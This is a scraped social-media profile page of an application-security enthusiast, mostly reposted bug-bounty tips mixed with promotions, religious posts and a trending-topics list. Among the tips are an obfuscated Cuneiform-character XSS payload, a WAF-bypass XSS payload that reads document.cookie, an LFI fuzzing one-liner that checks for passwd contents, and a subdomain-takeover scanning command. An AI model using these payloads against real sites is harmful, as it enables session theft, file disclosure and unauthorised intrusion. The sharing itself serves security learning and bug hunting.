
Hammad Ul Hassan
@Syntax3r
Trader 📈📊 | Security Enthusiast | AppSec Engineer | Nature Lover
قد يعجبك
an XSS payload, Cuneiform-alphabet based 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")() #bugbounty #bugbountytips #cybersecurity
![viehgroup's tweet image. an XSS payload, Cuneiform-alphabet based
𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()
#bugbounty #bugbountytips #cybersecurity](https://pbs.twimg.com/media/GuCPWgiWAAA8WJx.jpg)
Day 19 of finding a $100K bug 🐛 in 90 days on @immunefi. Spent the day binging @bountyhunt3rz podcasts on youtube—arguably the best bug hunting podcast out there. The insights from both the host @0xriptide and guests are pure gold! Learned a ton.

900+ WordPress plugins just casually leak their presence. No bruteforce, no guessing, just a simple request. Wild. Haven't seen anyone using this for recon yet. 🤔 Soon. cc: @leak_ix

Cybersecurity automation with AI/LLMs is starting to become and will be one of the most desired skillsets in the next 3-5 years in all of security.
Exciting times are ahead with AI making many things possible soon. However, it's crucial to limit the personal data we share online. Stay aware and stay safe!
Can your current tools cache 10,000 SBOMs transitive dependents in 30 seconds? Minefield can.
🚨 Guided Hacking Podcast - Episode 1 😎 Interviews with prominent reverse engineers and game hackers, getting to know them and finding out what makes them tick. 🚀 First Episode featuring Zac Canann, the developer of Squally, Squalr & CS420. 👉 youtube.com/watch?v=HilNYg…

Subdomain Takeover Detection with Subfinder & Nuclei -new wordpress takeover detection for nuclei template subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target #bugbountytips #bugbounty
![gudetama_bf's tweet image. Subdomain Takeover Detection with Subfinder & Nuclei
-new wordpress takeover detection for nuclei template
subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target
#bugbountytips #bugbounty](https://pbs.twimg.com/media/GYYC1-kasAAZyyu.jpg)
![gudetama_bf's tweet image. Subdomain Takeover Detection with Subfinder & Nuclei
-new wordpress takeover detection for nuclei template
subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target
#bugbountytips #bugbounty](https://pbs.twimg.com/media/GYYC1_CXMAACJlW.jpg)
![gudetama_bf's tweet image. Subdomain Takeover Detection with Subfinder & Nuclei
-new wordpress takeover detection for nuclei template
subfinder -d target -o target && nuclei -t wp-xyz-takeover[.]yaml -l target
#bugbountytips #bugbounty](https://pbs.twimg.com/media/GYYC1_HXgAA-7_e.jpg)
reposts, it will help you❤️🎧🕊️
Google Dorks - Vulnerable Parameters XSS, Open Redirect, SQLi, SSRF, LFI, RCE 🧵

try this amazing LFI oneliner also change ffuf useragent so its dont get blocked by waf's echo site.com | gau | urldedupe -qs | gf lfi | sed 's/=.*/=/' | qsreplace "FUZZ" | sort -u | while read urls; do ffuf -u $urls -w payloads/lfi.txt -c -mr "root:"" -v; done

A wonderful tool that combines nuclei, paramspider, NucleiFuzzer, httpx, a good tool for detecting sqli, xss, ssrf, open-redirect.. github.com/0xKayala/Nucle…


📣 Calling all aspiring cybersecurity professionals!🔒🔐 Want FREE access to top-notch Comptia CYSA+ Study material? 🎓✨ Follow us, like/RT this tweet, and reply with "CyberSHIELD" for a chance to win! 🙌🎉

HOW SURAH AD_DUHA CAN CHANGE YOUR LIFE. 🤍📚 THREAD

reposts, it will help you🤎🎧🕊️🥹
Top 10 Shodan Dorks !

🤖 STRIDE GPT v0.8 AI-powered threat modeling tool that generates threat models for a given application based on the STRIDE methodology 🆕 New features: * DREAD risk scoring * Auto-generate Gherkin test cases based on identified threats github.com/mrwadams/strid…

Amazon WAF Bypass :) <details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">

Witnessing some verses from the Qur’an 🥺😍❤️.
API hacking is NOT very simple ❌ The above statement is true if you do not know where to learn API hacking from. Down below is a list massive API hacking resources (for FREE). Learn, find, report and profit 💰

United States الاتجاهات
- 1. Bears 87.4K posts
- 2. Jake Moody 13K posts
- 3. Snell 23K posts
- 4. Falcons 50.2K posts
- 5. Bills 140K posts
- 6. Caleb 47.9K posts
- 7. Josh Allen 25.7K posts
- 8. #BearDown 2,273 posts
- 9. Jayden 22.1K posts
- 10. Swift 290K posts
- 11. #Dodgers 14.8K posts
- 12. Ben Johnson 4,191 posts
- 13. phil 163K posts
- 14. Turang 4,182 posts
- 15. Bijan 31.8K posts
- 16. Troy Aikman 6,085 posts
- 17. Roki 6,013 posts
- 18. #RaiseHail 8,379 posts
- 19. Joji 25.3K posts
- 20. #NLCS 14.3K posts
Something went wrong.
Something went wrong.